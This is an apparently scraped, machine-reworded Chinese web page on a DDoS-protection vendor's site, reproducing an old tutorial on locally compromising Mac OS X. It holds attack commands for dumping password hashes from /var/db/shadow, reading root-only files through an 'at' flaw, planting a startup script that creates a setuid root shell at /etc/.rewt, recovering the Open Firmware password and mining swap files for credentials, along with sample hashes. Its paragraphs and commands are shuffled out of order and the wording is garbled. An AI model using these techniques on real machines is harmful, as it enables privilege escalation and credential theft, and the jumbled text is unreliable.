黑客提供入侵本DDoS防御地Mac OS X的详细过程-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!
QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > CC防护 > 黑客提供入侵本DDoS防御地Mac OS X的详细过程

黑客提供入侵本DDoS防御地Mac OS X的详细过程

小墨安全管家 2020-09-08 05:15 CC防护 89 ℃
DDoS防御

接着,访咨询的StartupParameters.plist所包含的文本如下:

恢复开放固件密码

test C82D45B7-6422-11D9-853D-00039367EBAE 503

admin:D033E22AE348AEB5660FC2140AEC35850C4DA997

每次机器重启之后,这些交换文件将被清除。

URL处理程序漏洞利用

Permission denied

drwxrwxrwx 3  root admin 102  25 Apr 12:15 .

欺骗软件更新

# strings -8 /var/vm/swapfile0 | grep -A 4 -i longname

local: user$ nireport / /users name generateduid uid | grep -v NoValue

SMB 哈希:

00039367EBAE 209C6174DA490CAEB422F3FA5A7AE634F0D412BD764FFE81AAD3B435B5

如你所见,该名目的模式是chmod 777 ——这意味着我们能够对它写入文件。在此名目中,写一具相同名称的shell足本作为名目所包含的文本:

其差不多思路是引诱用户下载并安装一具DMG文件,接着尝试运行DMG文件中存储的代码。

如今能够作为Root只读那个文件,固然,我们也有一些窍门能够尝试,让你阅读这些文件。然而,首先要讲的是你目前已拥有Root权限。

%e4%e5%fa%fb%f8%f9%fe%ff%fc%fd%f2%f3%f0

当你用那个密码,你就能够启动到单用户模式或重启到你自个儿的MP3/MP4上存储的操作系统。

%eb%e8%e9%ee%ef%ec%ed%e2%e3%e0%e1%e6%e7

admin:209C6174DA490CAEB422F3FA5A7AE634:F0D412BD764FFE81AAD3B435B51404EE

chmod 4755 /etc/.rewt

检查/Library/Receipts/名目,创建一具与其中一具更新包和软件更新相同名字的文件,以替代它。

}

尝试一下你自个儿的机器(核实swapfile1、swap-file2等)。

uid=503(test) gid=503(test) groups=503(test)

test:0CB6948805F797BF2A82807973B89537:01FC5A6BE7BC6929AAD B435B51404EE

n  o  p  q  r  s  t  u  v  w  x  y  z

total 0

敏感的交换文件

那个巨长的字符串包含两个相同的密码哈希。第一具64个字符组成的SMB散列(这是Windows使用的文件共享,即使没有打开)这实际上是放在一起的两个32个字符的MD4散列。

密歇根大学MacSIG小组编写一具C足本,可以生成字符串作为使用开放固件的密码:

at -f /var/db/shadow/hash/559DBF44-4231-11D9A5A8-00039367EBAE now+1minute

最终40个字符组成了SHA1哈希。你一旦恢复那个文件,所有剩下的工作算是正确地格式化那个文件并经过Ripper或Lepton's Crack举行破解。

经过这些技巧,你可以在受害者机器中执行代码,加载任何Web链接。

Mac OS X有一具方便的工具,能够对安全更新软件和软件补丁举行自动检查更新。假如你有机遇获得一台机器,你能够利用这种方式举行欺骗,感觉你基本安装了特定的软件更新和补丁。

local: user$ at -f /users/admin/.bash_history now+1minute

nvram security-password

$  %  ^  &  *  (  )  +  =  -  _  }  {

破解用户密码

-rw------- 1 admin staff 1259 12 Apr 2010 /users/admin/. bash_history

A  B  C  D  E  F  G  H  I  J  K  L  M

admin 559DBF44-4231-11D9-A5A8-00039367EBAE 501

下次重启机器,它会执行你写好的shell足本。那个特殊的足本将在/etc/.rewt里面建立一具suid root。

1404EED033E22AE348AEB5660FC2140AEC35850C4DA997

有一些Mac OS X安全咨询题与URL处理有关。

ls -al /Library/StartupItems/

local: user$ ls -al /users/admin/.bash_history

%cb%c8%c9%ce%cf%cc%cd%c2%c3%c0%c1%c6%c7

czy a011afa33.000 will be executed using /bin/sh

drwxrwxr-x 39 root admin 1326 26 Apr 09:28 ..

很多公共计算机,非常是商业网(网吧),使用特殊的安全软件或跟踪装置以阻挠你的一些活动,甚至要求你按小时支付。通常,你能够重启计算机进入开放固件并使用系统的单用户模式,要么仅仅启动到一具外部设备,例如,将Mac OS X复制并安装在你的Mp3或Mp4设备里面。不幸的是,越来越多的计算机都有了开放固件密码的爱护措施,这需要你首先验证所做的这些情况。

nvram security-password

{

其它有味的还有:x-man-page://、telnet://、ssh://、ical://、addressbook://、itms://、mms://等等。

还有另一种想法算是,使用暂时交换文件恢复密码。包括FileVault、Keychain、login和其它存储在/var/vm/各种敏感数据交换文件,这些文件特别大,它需要一些聪慧的Unix命令才可以提取其中实用的东西。可是,特别多时候用户名和密码以纯文本方式存储。

Provides = ("NameOfScript");

经过Root读取/usr/bin/at

cp /bin/sh /etc/.rewt

%8e%8f%f4%8c%80%82%83%81%97%87%f5%d7%d1

恶意启动项目的利用

orb 5D97A400-5045-11D9-AFEB-00039367EBAE 502

使用那个你应该可以经过字符串匹配的nvram security-password从而找到密码。你也能够使用下面内容作为参考:

local: user$ cat /var/at/jobs/a011afa33.000

orb:6FFB224FB592476B2230862E220937DA:4B881A967FE694FBAAD3B435B51404EE

test:A94A8FE5CCB19BA61C4C0873D391E987982FBBD3

%c4%c5%da%db%d8%d9%de%df%dc%dd%d2%d3%d0

Description = "NameOfScript";

本文从提升权限漏洞的一系列巧妙的想法来绕过受爱护的Mac OS X。有点基本被处于底层操纵,但由于它们存在着更多的认证和修补程序,我们不妨让这些提供出来,以便需要的人学习它们。尽管我不不过要利用足本,而且之后我将解释能够做哪些情况,让你利用这些技巧可以充分地举行研究。

本文上述的利用方案并不是所有,包括过去数年的漏洞攻击并没有提及到。假如你需要针对的是远程系统执行入侵任务,这么,你需要更多的思路举行研究,它也存在着更多的灵便性和窍门能够提供我们应用,我们需要积极地发掘它们。

你能够编写一具HTML文件,经过Javascript或一具meta刷新标记自动重定向到一具特定的URL。

orb:23119F5947DA61A815E7A1CC2AF9BDB8C19CAF1F

local: user$ id

这将允许你读取由“admin”用户所执行的命令列表:

security-password: %d9%df%da%cf%d8%d9%cf%c1%d8%cf%de

在过去的生活里你只需执行“nidump passwd”,并获得所实用户密码加密的一具DES清单。还有几种想法能够恢复用户密码,Mac OS X在/etc/shadow或/etc/master密码文件中不存储密码。然而,有一种想法能够恢复所实用户的密码哈希。

DMG文件内容能够包含一具特制的应用程序调用Fun.app,它能够自动打开一具新的URL处理程序。

所以,“admin”用户的密码存储在/var/db/shadow/hash/559DBF44-4231-11D9-A5A8-00039367EBAE.

N  O  P  Q  R  S  T  U  V  W  X  Y  Z

#!/bin/sh

假如/Library/StartupItems名目没有被创建,关于某些软件则需要创建它,以便机器重启时可以运行程序。这些足本由root运行。往往写得不行的软件在安装时将创建到此名目中,并允许任何用户使用该名目中的文件。人们能够编写一具恶意足本,删除该名目,重启计算机,并可以以root身份执行足本。

%9b%98%99%9e%9f%9c%9d%92%93%9a%8b%ea%89

Mac OS X使用NetInfo处理用户账户。该密码哈希存储在/var/db/shadow/hash/(guid)。每个用户都有自个儿的哈希文件,要获得一具用户清单及其相应产生的uid(guid),尝试:

尾声

SHA1 哈希:

那个允许你作为root身份读取/usr/bin/at并分析存在的漏洞。使用这一招,你能够阅读各种敏感文件,包括用户密码哈希、暂时交换文件、.bash_history文件等。

OrderPreference = "None";

只要你有权使用本地机器,你能够阅读所有文件的哈希值:

a  b  c  d  e  f  g  h  i  j  k  l  m

# cat /var/db/shadow/hash/559DBF44-4231-11D9-A5A8

固然,这些文件只能由root读取。你能够使用“at”漏洞,将这些交换文件复制到暂时位置,接着使用上面的命令来解析这些文件。

chown root /etc/.rewt


DDoS防御

当前位置:主页 > CC防护 > 黑客提供入侵本DDoS防御地Mac OS X的详细过程

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119